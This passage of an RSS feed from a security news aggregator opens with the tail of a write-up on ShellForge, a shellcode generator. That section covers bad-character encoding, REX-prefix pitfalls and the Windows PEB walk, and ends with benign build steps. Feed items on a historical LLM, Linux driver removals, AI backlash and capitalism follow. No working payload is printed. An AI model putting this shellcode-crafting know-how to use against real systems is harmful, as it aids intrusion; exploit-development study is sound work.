bkpt-based syscall invocation or interwork stubs, but this is deferred as future work.</p><p><strong>Windows reverse/bind shell is not implemented.</strong> The Windows synthesiser currently handles WinExec and arbitrary write. Reverse shell requires resolving WSAStartup, WSASocketA, and connect from ws2_32.dll — a multi-library PEB walk that's architecturally straightforward but not yet in the codebase.</p><h3>What I Learned</h3><p>Building ShellForge taught me things that reading about shellcode development never could.</p><p>The constraint-ordering bug — checking stub cleanness before patching in the key — cost me two hours of debugging. The fix was three lines. But understanding <em>why</em> the order matters requires understanding that \x00 placeholder bytes in the stub template will fail a null-free check before you've had a chance to replace them with real values.</p><p>The REX prefix problem is the kind of thing that doesn’t appear in any tutorial. You learn it when your encoder works perfectly in testing and then silently fails the moment someone adds \x48 to their bad char list.</p><p>The Windows PEB walk is genuinely elegant engineering. The fact that every Windows process exposes its loaded module list through a predictable structure at a fixed offset from GS — and that you can walk it without any API calls — is one of those design decisions that was probably not intended as a feature for shellcode authors, but became one anyway.</p><h3>The Code</h3><p>ShellForge is open source on GitHub: <strong>[github.com/userIssa/shellforge]</strong></p><p>The stack:</p><ul><li>C99 core (libshellforge.so) — constraint model, synthesisers, encoders</li><li>Python bridge (shellforge_bridge.py) — ctypes interface</li><li>Flask REST API (app.py) — /synthesize, /annotate, /arches</li><li>GPT-4o-mini annotation — plain-English shellcode explanation</li><li>Single-file HTML dashboard — no Node required</li></ul><p>To run it:</p><pre>git clone https://github.com/userIssa/shellforge<br>cd shellforge/core &amp;&amp; bash build.sh<br>pip install flask flask-cors openai<br>OPENAI_API_KEY=your_key python python/api/app.py<br># open frontend/dashboard.html in your browser</pre><p><em>If this was useful, connect with me on </em><a href="http://linkedin.com/in/toluwanimi-oderinde/"><em>LinkedIn</em></a></p><p><em>#CyberSecurity #PenetrationTesting #ExploitDevelopment #Shellcode #InfoSec #RedTeam #CEH</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/956/1*e6-Ab0iTntvk_gPy0MTkCg.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/950/1*c_xiP3Ao7hYObNyHJpyjDw.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/954/1*i6VihmDjVI9auC7WBVlPoQ.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*LG7M5kkMFCB68ra7MaQ3Zw.png"></figure><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=f57eaea15c78" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/shellforge-building-a-constraint-aware-shellcode-generator-from-scratch-f57eaea15c78">ShellForge: Building a Constraint-Aware Shellcode Generator from Scratch</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meet Talkie-1930: A 13B Open-Weight LLM Trained on Pre-1931 English Text for Historical Reasoning and Generalization Research]]></title>
<description><![CDATA[What if a language model had never heard of the internet, smartphones, or even World War II? That’s not a hypothetical — it’s exactly what a team of researchers led by Nick Levine, David Duvenaud, and Alec Radford has built. They call it talkie, and it may be the most historically disciplined lar...]]></description>
<link>https://tsecurity.de/de/3469788/ai-nachrichten/meet-talkie-1930-a-13b-open-weight-llm-trained-on-pre-1931-english-text-for-historical-reasoning-and-generalization-research/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3469788/ai-nachrichten/meet-talkie-1930-a-13b-open-weight-llm-trained-on-pre-1931-english-text-for-historical-reasoning-and-generalization-research/</guid>
<pubDate>Tue, 28 Apr 2026 04:32:13 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>What if a language model had never heard of the internet, smartphones, or even World War II? That’s not a hypothetical — it’s exactly what a team of researchers led by Nick Levine, David Duvenaud, and Alec Radford has built. They call it talkie, and it may be the most historically disciplined large language model […]</p>
<p>The post <a href="https://www.marktechpost.com/2026/04/27/meet-talkie-1930-a-13b-open-weight-llm-trained-on-pre-1931-english-text-for-historical-reasoning-and-generalization-research/">Meet Talkie-1930: A 13B Open-Weight LLM Trained on Pre-1931 English Text for Historical Reasoning and Generalization Research</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Linux  Drops ISDN Subsystem and Other Old Network Drivers]]></title>
<description><![CDATA["Old code like amateur radio and NFC have long been a burden to core networking developers," reads the pull request. 

And so Thursday Linus Torvald merged the pull request "to rid the Linux kernel of the old Integrated Services Digital Network (ISDN) subsystem," reports Phoronix, "and various ot...]]></description>
<link>https://tsecurity.de/de/3464483/it-security-nachrichten/linux-drops-isdn-subsystem-and-other-old-network-drivers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3464483/it-security-nachrichten/linux-drops-isdn-subsystem-and-other-old-network-drivers/</guid>
<pubDate>Sat, 25 Apr 2026 19:48:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA["Old code like amateur radio and NFC have long been a burden to core networking developers," reads the pull request. 

And so Thursday Linus Torvald merged the pull request "to rid the Linux kernel of the old Integrated Services Digital Network (ISDN) subsystem," reports Phoronix, "and various other old network drivers largely for PCMCIA era network adapters."


 This was the code suggested for removal given the recent influx of AI/LLM-generated bug reports against this dated code that likely has no active upstream users remaining... [W]ith the large language models and increased code fuzzing finding potential issues with these drivers for obsolete hardware, it's easier to just get rid of these drivers if no one is actively using the hardware from decades ago...

This merge lightens the kernel by 138,161 lines of code with ISDN gone and numerous old network adapters and also getting rid of legacy ATM device drivers as well as the amateur ham radio support. The main networking drivers removed affect the 3com 3c509 / 3c515 / 3c574 / 3c589, AMD Lance, AMD NMCLAN, SMSC SMC9194 / SMC91C92, Fujitsu FMVJ18X, and 8390 AX88190 / Ultra / WD80X3. 

Linux 7.1 also has removed the long-obsolete bus mouse support as well as beginning to phase out Intel 486 CPU support and removing support for Russia's Baikal CPUs.


<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Linux++Drops+ISDN+Subsystem+and+Other+Old+Network+Drivers%3A+https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F04%2F25%2F0757219%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F04%2F25%2F0757219%2Flinux-drops-isdn-subsystem-and-other-old-network-drivers%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://linux.slashdot.org/story/26/04/25/0757219/linux-drops-isdn-subsystem-and-other-old-network-drivers?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Will the backlash against AI turn violent? – podcast]]></title>
<description><![CDATA[An attack on the home of OpenAI’s CEO Sam Altman – and on the company’s headquarters – has led to concerns the backlash against AI could become violent. Guardian journalist Nick Robins-Early and researcher Sean Fleming discussIn a couple of weeks, at an arraignment hearing in California, Daniel M...]]></description>
<link>https://tsecurity.de/de/3459857/ai-nachrichten/will-the-backlash-against-ai-turn-violent-podcast/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3459857/ai-nachrichten/will-the-backlash-against-ai-turn-violent-podcast/</guid>
<pubDate>Fri, 24 Apr 2026 04:02:07 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>An attack on the home of OpenAI’s CEO Sam Altman – and on the company’s headquarters – has led to concerns the backlash against AI could become violent. Guardian journalist Nick Robins-Early and researcher Sean Fleming discuss</p><p>In a couple of weeks, at an arraignment hearing in California, Daniel Moreno-Gama will face formal charges, including attempted double homicide.</p><p>It comes after his attack on the home of OpenAI CEO Sam Altman – throwing a molotov cocktail at the property – before attempting to break into the entrance of the company’s headquarters hours later.</p> <a href="https://www.theguardian.com/news/audio/2026/apr/24/will-the-backlash-against-ai-turn-violent-podcast">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Opinion: Which capitalism are we defending?]]></title>
<description><![CDATA[Seattle venture capitalist Nick Hanauer responds to Chris DeVore's recent call for Democrats to embrace capitalism, arguing that the real question isn't whether to support free markets but which version of capitalism America should be building. Read More]]></description>
<link>https://tsecurity.de/de/3458557/it-nachrichten/opinion-which-capitalism-are-we-defending/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3458557/it-nachrichten/opinion-which-capitalism-are-we-defending/</guid>
<pubDate>Thu, 23 Apr 2026 17:16:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1129" height="1260" src="https://cdn.geekwire.com/wp-content/uploads/2023/03/Shop-Favorite-1-1129x1260.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://cdn.geekwire.com/wp-content/uploads/2023/03/Shop-Favorite-1-1129x1260.jpg 1129w, https://cdn.geekwire.com/wp-content/uploads/2023/03/Shop-Favorite-1-768x857.jpg 768w, https://cdn.geekwire.com/wp-content/uploads/2023/03/Shop-Favorite-1-1376x1536.jpg 1376w, https://cdn.geekwire.com/wp-content/uploads/2023/03/Shop-Favorite-1-1834x2048.jpg 1834w, https://cdn.geekwire.com/wp-content/uploads/2023/03/Shop-Favorite-1-630x703.jpg 630w, https://cdn.geekwire.com/wp-content/uploads/2023/03/Shop-Favorite-1.jpg 2000w" sizes="(max-width: 1129px) 100vw, 1129px"><br>Seattle venture capitalist Nick Hanauer responds to Chris DeVore's recent call for Democrats to embrace capitalism, arguing that the real question isn't whether to support free markets but which version of capitalism America should be building. <a href="https://www.geekwire.com/2026/opinion-which-capitalism-are-we-defending/">Read More</a>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,43ms -->